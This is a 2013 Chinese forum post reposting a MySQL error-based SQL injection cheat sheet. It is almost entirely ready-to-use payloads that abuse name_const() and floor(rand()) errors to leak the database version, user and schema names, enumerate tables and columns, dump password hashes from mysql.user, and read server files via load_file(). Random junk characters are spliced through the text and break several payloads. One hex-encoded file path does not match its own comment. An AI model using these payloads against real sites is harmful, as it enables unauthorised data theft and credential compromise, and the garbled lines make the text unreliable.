Mysql暴错注入参考（pdf）

admin

本帖最后由 Nightmare 于 2013-3-17 14:20 编辑

/ t, S3 \) {$ u' G1 E; G  D2 v
Mysql暴错注入参考（pdf），每天一贴。。。

MySql Error Based Injection Reference
[Mysql暴错注入参考]
Authornig0s1992
Blog:http://pnig0s1992.blog.51cto.com/
( m2 C% c& O5 S3 g% Q8 dTeAm:http://www.FreeBuf.com/
; ]# `! I/ F$ [. t6 MMysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
小部分版本使用name_const()时会报错.可以用给出的Method.2测试
: G' o: C* O$ y+ \/ E' c+ B, D) ]查询版本:
$ o2 c3 }8 U# l! h0 e! r+ K! {Method.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
join+(select+name_const(@@version,0))b)c)
* e  }" Y: _5 p, m9 VMethod.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
  \" o8 n; q" G4 Q: mup by a)b)
' I# |9 r0 h" L& e% K查询当前用户:
Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
9 r7 l/ O* i! q) }( j0 Gand(0)*2))x+from+information_schema.tables+group+by+x)a)
查询当前数据库:
Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
( ?& B4 q; [' f& jMethod.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
or(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
" A: ^* A$ \; M8 bLIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
; S  d3 X4 P8 G: \% b6 y# Z顺序替换
! k8 {# j/ g3 ~, g爆指定库数目:
) X2 a; D6 S) p  w/ hand+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
* x( _: P8 `( U% y- y% S5 |able_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
+by+x)a)+and+1=1 0x6D7973716C=mysql
9 x  _/ p2 D% o" L1 V依次爆表:
6 {  y8 h0 K1 ~. O+ cand+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
$ r  E6 j4 n6 B, n8 N0 b; Kable_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
# b( D  P# x" o) ibles+group+by+x)a)+and+1=1
0x6D7973716C=Mysql 将n顺序替换
; n) D1 U( l9 P+ {7 X爆表内字段数目:
; E6 v# u4 g) r5 p1 {8 `and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
! b4 ]5 T) }. F- w7 g5 x+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
1 H6 h8 ~' Q( t3 S4 k依次爆字段:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
loor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换
/ h4 ^1 G. M. N- q8 H6 n4 H$ U) K依次暴内容:
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
ma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
将n顺序替换
, K. E; x- @4 s: N爆文件内容:
4 n8 |- i1 V" Pand+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
6 {6 f. F* k! ^. Wfrom+information_schema.tables+group+by+a)b)
0 I- r0 x- M  W6 c) t0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
Thx for reading.

不要下载也可以，
1 `) l  S! e; f! W8 K( U